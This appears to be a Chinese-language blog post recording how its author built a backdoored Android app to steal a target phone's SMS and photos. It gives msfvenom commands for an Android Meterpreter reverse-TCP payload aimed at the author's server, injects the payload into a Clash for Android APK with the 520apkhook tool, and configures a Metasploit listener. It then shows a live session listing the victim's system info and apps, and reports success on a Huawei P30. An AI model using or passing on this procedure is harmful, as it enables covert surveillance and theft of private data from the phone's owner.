Trash Bin
0%

DevRecord-AndroidBackdoorApp

Posted on Edited on In
Symbols count in article: 3k Reading time ≈ 3 mins.

Pre:

需求:给一个目标安卓手机植入后门app,以获取其短信、相册等信息。

整体思路:

  1. 服务器安装并运行msf框架,开启监听

  2. 使用520apkhook注入一个干净的apk,生成新的apk

  3. 目标手机安装修改后的apk,打开app后,肉鸡能够上线

centos7运行msf框架:

安装msf:

参考文章:

msf快速安装命令:

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

快速安装脚本报错,需要修改yum的一些配置:

1
2
3
4
vim /usr/libexec/urlgrabber-ext-down
vim /usr/bin/yum

python -> python2

报错解决参考文章:

安装Postgresql:

一开始直接用yum安装了PostgreSQL 9.2几的版本,发现和安装的msf不兼容。

1
2
msf6 > db_status
[-] Error while running command db_status: Your version of PostgreSQL (90224) is too old. Active Record supports PostgreSQL >= 9.3.

后来选择重新安装psql11版本的。参考文章:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# yum安装
yum install postgresql11 postgresql11-devel postgresql11-libs postgresql11-server -y

# 修改环境变量
export PATH=/usr/pgsql-11/bin:$PATH
/usr/pgsql-11/bin/

# 系统启动配置
systemctl start postgresql-11
systemctl restart postgresql-11

# 忘记密码,可以在配置文件里设置为trust后进入psql
# 修改配置文件
vim /var/lib/pgsql/11/data/pg_hba.conf

配置msf连接psql:

1
2
3
4
cp /opt/metasploit-framework/embedded/framework/config/database.yml.example /opt/metasploit-framework/embedded/framework/config/database.yml

# 给msf创建psql用户
ALTER USER postgres WITH PASSWORD 'msf';

参考文章:

安装jdk11:

参考文章:

1
2
3
4
5
6
7
# 修改环境变量,替换原来的jdk1.8
vim /etc/profile.d/jdk11.sh

# 向文件中添加如下内容
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-11.0.21.0.9-1.el7_9.x86_64
export CLASSPATH=.:$JAVA_HOME/lib/
export PATH=$JAVA_HOME/bin:$PATH

注入apk:

使用该github项目: https://github.com/ba0gu0/520apkhook

下载一个干净的apk:

  1. 下载Releases中打包好的jar包

https://github.com/ba0gu0/520apkhook/releases

  1. msfmsfvenom:

1
2
3
4
5
# 官方
msfvenom -p android/meterpreter/reverse_tcp lhost=服务器ip lport=3306 -o ~/Downloads/msf.apk

# 自己的
msfvenom -p android/meterpreter/reverse_tcp lhost=74.48.x.x lport=10001 -o /jhack/cfa-2.5.12-premium-universal-release.apk

  1. 启动msfconsole

1
2
3
4
5
6
7
# 启动 msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 10001
set exitonsession false
exploit -j

20231223150435

  1. 520ApkHook:

1
2
3
4
5
# 官方教程:
java -jar a520ApkHook-1.0-jar-with-dependencies.jar  ~/Downloads/京东.apk ~/Downloads/msf.apk

# centos7:
java -jar a520ApkHook-1.1-jar-with-dependencies.jar /jhack/ClashForAndroid\ 2.5.12.apk /jhack/NewClashForAndroid.apk

20231223150534
20231223150819

  1. 520ApkHook工具会生成出一个修改好的pk

目标安卓手机运行后门app:

20231223160745
目标安卓手机安装apk,并运行app.肉鸡上线成功。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 获取目标手机系统信息
meterpreter > sysinfo
Computer        : localhost
OS              : Android 10 - Linux 4.14.116 (aarch64)
Architecture    : aarch64
System Language : zh_CN_#Hans
Meterpreter     : dalvik/android

# 获取应用列表
meterpreter > app_list
Application List
================

Name                                     Package                                   Running  IsSystem
----                                     -------                                   -------  --------
ARCore                                   com.google.ar.core                        false    true
AREngineServer                           com.huawei.arengine.service               false    true
AirLink                                  com.huawei.airlink                        false    true

更多的msf利用命令可参考:

测试结果:

  • 华为p30 harmonyos 3.0 成功

  • 华为p40 harmonyos 4.0 系统版本号5.10.43 失败

Refs:

Related Posts